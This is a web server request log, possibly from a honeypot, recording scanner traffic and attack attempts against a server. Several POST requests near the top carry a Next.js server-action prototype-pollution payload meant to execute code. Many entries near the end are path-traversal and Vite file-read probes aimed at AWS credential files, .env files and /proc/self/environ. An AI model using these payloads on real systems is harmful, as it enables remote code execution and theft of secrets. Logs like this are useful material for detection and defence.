User-Agent: Mozilla/5.0 (Linux; Android 14; SM-F9560 Build/UP1A.231005.007; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/127.0.6533.103 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:41664
Path: /app
URL: /app
Method: POST
[2026-02-20 03:19:22] === HTTP Request ===
===================
------WebKitFormBoundaryx195779085811--
------WebKitFormBoundaryx195779085811
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx195779085811
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 45430+true+4309467;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx195779085811
Accept-Encoding: gzip, deflate
Content-Length: 517
X-Nextjs-Html-Request-Id: ilovepoop_195779085811
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx195779085811
X-Nextjs-Request-Id: poop1234
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:41654
Path: /_next/server
URL: /_next/server
Method: POST
[2026-02-20 03:19:21] === HTTP Request ===
===================
------WebKitFormBoundaryx1584332856428--
------WebKitFormBoundaryx1584332856428
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1584332856428
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 199607+true+7937261;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1584332856428
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1584332856428
X-Nextjs-Request-Id: poop1234
Connection: close
Content-Length: 522
X-Nextjs-Html-Request-Id: ilovepoop_1584332856428
Next-Action: x
User-Agent: Mozilla/5.0 (Linux; Android 9; AFTWMST22 Build/PS7233; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/88.0.4324.152 Mobile Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:41648
Path: /api
URL: /api
Method: POST
[2026-02-20 03:19:21] === HTTP Request ===
===================
------WebKitFormBoundaryx702194947025--
------WebKitFormBoundaryx702194947025
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx702194947025
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 313658+true+2238728;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx702194947025
Content-Length: 518
X-Nextjs-Html-Request-Id: ilovepoop_702194947025
X-Nextjs-Request-Id: poop1234
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx702194947025
Next-Action: x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:41636
Path: /_next
URL: /_next
Method: POST
[2026-02-20 03:19:21] === HTTP Request ===
[2026-02-20 03:19:20] Main page accessed - IP: 31.59.129.233:41634
===================
------WebKitFormBoundaryx51588917027--
------WebKitFormBoundaryx51588917027
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx51588917027
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 13331+true+3869846;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx51588917027
X-Nextjs-Html-Request-Id: ilovepoop_51588917027
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx51588917027
Connection: close
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Content-Length: 513
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:41634
Path: /
URL: /
Method: POST
[2026-02-20 03:19:20] === HTTP Request ===
[2026-02-20 03:19:20] Main page accessed - IP: 31.59.129.233:41618
===================
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 31.59.129.233:41618
Path: /
URL: /
Method: GET
[2026-02-20 03:19:20] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.11
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.223.120.107:57956
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-20 03:16:51] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.223.120.107:57946
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-20 03:16:51] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.223.120.107:57934
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-20 03:16:51] === HTTP Request ===
[2026-02-20 03:16:51] Login page accessed - IP: 89.223.120.107:57928
===================
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.11
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.223.120.107:57928
Query: redir=%2F
Path: /login
URL: /login?redir=%2F
Method: GET
[2026-02-20 03:16:51] === HTTP Request ===
[2026-02-20 03:16:51] Login page accessed - IP: 89.223.120.107:57918
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_0_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/19.0 Safari/605.1.15
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.223.120.107:57918
Path: /login
URL: /login
Method: GET
[2026-02-20 03:16:51] === HTTP Request ===
[2026-02-20 03:16:51] Main page accessed - IP: 89.223.120.107:57910
===================
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 89.223.120.107:57910
Path: /
URL: /
Method: GET
[2026-02-20 03:16:51] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 81.168.83.103:50014
Path: /.vscode/sftp.json
URL: /.vscode/sftp.json
Method: GET
[2026-02-20 02:30:21] === HTTP Request ===
[2026-02-20 02:26:42] Main page accessed - IP: 205.210.31.107:60712
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: anzan.tech
RemoteAddr: 205.210.31.107:60712
Path: /
URL: /
Method: GET
[2026-02-20 02:26:42] === HTTP Request ===
[2026-02-20 00:46:12] Main page accessed - IP: 172.30.0.12:33298
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.153.141
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:33298
Path: /
URL: /
Method: GET
[2026-02-20 00:46:12] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 135.125.74.209:51548
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-20 00:21:48] === HTTP Request ===
[2026-02-20 00:21:48] Main page accessed - IP: 85.217.140.22:56554
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; ModatScanner/1.2; +https://modat.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 85.217.140.22:56554
Path: /
URL: /
Method: GET
[2026-02-20 00:21:48] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Accept-Encoding: gzip, deflate, gzip, deflate
Accept-Language: en US,en;q=0.9,sv;q=0.8
X-Requested-With: XMLHttpRequest
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.92:14496
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-02-19 23:59:34] === HTTP Request ===
[2026-02-19 23:47:27] Main page accessed - IP: 147.185.132.82:57444
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: defect.vulnberries.ru
RemoteAddr: 147.185.132.82:57444
Path: /
URL: /
Method: GET
[2026-02-19 23:47:27] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:55834
Path: /jars
URL: /jars
Method: GET
[2026-02-19 23:44:01] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.26:43047
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 22:53:12] === HTTP Request ===
[2026-02-19 22:51:20] Main page accessed - IP: 91.230.168.180:38137
===================
Accept-Language: en-US,en;q=0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 91.230.168.180:38137
Path: /
URL: /
Method: GET
[2026-02-19 22:51:20] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 213.171.15.173:45916
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 21:58:19] === HTTP Request ===
[2026-02-19 21:58:19] Main page accessed - IP: 213.171.15.173:45914
===================
Connection: close
Accept-Encoding: gzip
Accept-Charset: utf-8
User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 213.171.15.173:45914
Path: /
URL: /
Method: GET
[2026-02-19 21:58:19] === HTTP Request ===
[2026-02-19 21:18:54] Main page accessed - IP: 147.185.132.195:61016
===================
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 147.185.132.195:61016
Path: /
URL: /
Method: GET
[2026-02-19 21:18:54] === HTTP Request ===
[2026-02-19 19:18:24] Main page accessed - IP: 152.89.218.126:25926
===================
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 152.89.218.126:25926
Path: /
URL: /
Method: GET
[2026-02-19 19:18:24] === HTTP Request ===
===================
Upgrade-Insecure-Requests: 1
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Sec-Ch-Ua-Platform: "Linux"
Sec-Ch-Ua-Mobile: ?0
Sec-Fetch-Dest: document
Sec-Fetch-User: ?1
Sec-Fetch-Site: none
Sec-Gpc: 1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Sec-Fetch-Mode: navigate
Accept-Language: en-US,en;q=0.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.22.232.81:58706
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 19:18:05] === HTTP Request ===
[2026-02-19 19:18:05] Main page accessed - IP: 165.22.232.81:58694
===================
Sec-Fetch-Dest: document
Sec-Fetch-Site: none
Accept-Language: en-US,en;q=0.5
Sec-Ch-Ua-Platform: "Linux"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua: "Google Chrome";v="142", "Not-A.Brand";v="8", "Chromium";v="142"
Accept-Encoding: gzip, deflate
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Sec-Fetch-Mode: navigate
Sec-Gpc: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 165.22.232.81:58694
Path: /
URL: /
Method: GET
[2026-02-19 19:18:05] === HTTP Request ===
===================
Sec-Fetch-Dest: script
Dnt: 1
Te: trailers
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Gpc: 1
Cache-Control: no-cache
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:38304
Path: /favicon.ico/sellers.json
URL: /favicon.ico/sellers.json
Method: GET
[2026-02-19 18:20:56] === HTTP Request ===
===================
Sec-Fetch-Mode: no-cors
Sec-Gpc: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Te: trailers
Sec-Fetch-Site: cross-site
Sec-Fetch-Dest: script
Cache-Control: no-cache
Dnt: 1
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:38296
Path: /favicon.ico/app-ads.txt
URL: /favicon.ico/app-ads.txt
Method: GET
[2026-02-19 18:20:56] === HTTP Request ===
===================
Te: trailers
Sec-Fetch-Dest: script
Cache-Control: no-cache
Dnt: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Mode: no-cors
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Sec-Fetch-Site: cross-site
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:38282
Path: /favicon.ico/ads.txt
URL: /favicon.ico/ads.txt
Method: GET
[2026-02-19 18:20:56] === HTTP Request ===
===================
Te: trailers
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Gpc: 1
Accept-Language: en-US,en;q=0.9
Cache-Control: no-cache
Dnt: 1
Connection: keep-alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Sec-Fetch-Dest: script
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:38272
Path: /login/favicon.ico
URL: /login/favicon.ico
Method: GET
[2026-02-19 18:20:56] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/login
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:52263
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 18:20:54] === HTTP Request ===
[2026-02-19 18:20:53] Login page accessed - IP: 51.158.248.225:52263
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:52263
Path: /login
URL: /login
Method: GET
[2026-02-19 18:20:53] === HTTP Request ===
===================
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:52263
Path: /static/config.js
URL: /static/config.js
Method: GET
[2026-02-19 18:20:53] === HTTP Request ===
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: */*
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:47047
Path: /static/app.js
URL: /static/app.js
Method: GET
[2026-02-19 18:20:53] === HTTP Request ===
===================
Accept-Encoding: gzip, deflate
Referer: http://95.143.191.38:8081/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Accept-Language: en-US,en;q=0.9
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:58025
Path: /static/style.css
URL: /static/style.css
Method: GET
[2026-02-19 18:20:53] === HTTP Request ===
[2026-02-19 18:20:53] Main page accessed - IP: 51.158.248.225:58025
===================
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.3
Upgrade-Insecure-Requests: 1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:58025
Path: /
URL: /
Method: GET
[2026-02-19 18:20:53] === HTTP Request ===
[2026-02-19 18:20:52] Main page accessed - IP: 51.158.248.225:38244
===================
User-Agent: curl/7.81.0
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 51.158.248.225:38244
Path: /
URL: /
Method: HEAD
[2026-02-19 18:20:52] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 40.80.201.49:54998
Path: /manager/text/list
URL: /manager/text/list
Method: GET
[2026-02-19 17:16:35] === HTTP Request ===
===================
Via: 1.1 Caddy
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
Accept-Encoding: gzip
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 141.98.11.107
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:36054
Path: /.env
URL: /.env
Method: GET
[2026-02-19 16:57:52] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:52366
Path: /jars
URL: /jars
Method: GET
[2026-02-19 16:26:53] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.229:55989
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 16:06:13] === HTTP Request ===
[2026-02-19 16:06:13] Main page accessed - IP: 104.152.52.229:36141
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.229:36141
Path: /
URL: /
Method: GET
[2026-02-19 16:06:13] === HTTP Request ===
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.137:54467
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-02-19 15:55:51] === HTTP Request ===
[2026-02-19 15:55:51] Main page accessed - IP: 104.152.52.137:58671
===================
Connection: close
Accept: */*
User-Agent: curl/7.61.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 104.152.52.137:58671
Path: /
URL: /
Method: GET
[2026-02-19 15:55:51] === HTTP Request ===
===================
User-Agent: Python/3.9 python-socks/2.0.3
Headers:
Protocol: HTTP/1.1
Host: 193.149.189.126:7227
RemoteAddr: 5.181.0.133:7166
Path:
URL: //193.149.189.126:7227
Method: CONNECT
[2026-02-19 14:33:36] === HTTP Request ===
===================
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.92:13160
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-02-19 13:29:56] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57652
Path: /../../../../../../home/ubuntu/.aws/credentials
URL: /..%2f..%2f..%2f..%2f..%2f..%2fhome/ubuntu/.aws/credentials
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57648
Path: /../../../../../../root/.aws/credentials
URL: /..%2f..%2f..%2f..%2f..%2f..%2froot/.aws/credentials
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57644
Path: /../../../../../../../home/node/.aws/credentials
URL: /../../../../../../../home/node/.aws/credentials
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57628
Path: /../../../../../../../home/ubuntu/.aws/credentials
URL: /../../../../../../../home/ubuntu/.aws/credentials
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57620
Path: /../../../../../../../root/.aws/credentials
URL: /../../../../../../../root/.aws/credentials
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57616
Path: /../../../../../../../root/.env
URL: /../../../../../../../root/.env
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57602
Path: /../../../../../../../app/.env
URL: /../../../../../../../app/.env
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57594
Path: /../../../../../../../proc/self/environ
URL: /../../../../../../../proc/self/environ
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57578
Path: /../../../../../../proc/self/environ
URL: /..%2f..%2f..%2f..%2f..%2f..%2fproc/self/environ
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57572
Query: raw??
Path: /@fs/src/.env
URL: /@fs/src/.env?raw??
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57560
Query: raw??
Path: /@fs/app/.env.production
URL: /@fs/app/.env.production?raw??
Method: GET
[2026-02-19 13:07:16] === HTTP Request ===
===================
Connection: close
User-Agent: Mozilla/5.0 (compatible; silver.inc/2.0)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 204.76.203.210:57554
Query: raw??
Path: /@fs/app/.env.local
URL: /@fs/app/.env.local?raw??
Method: GET
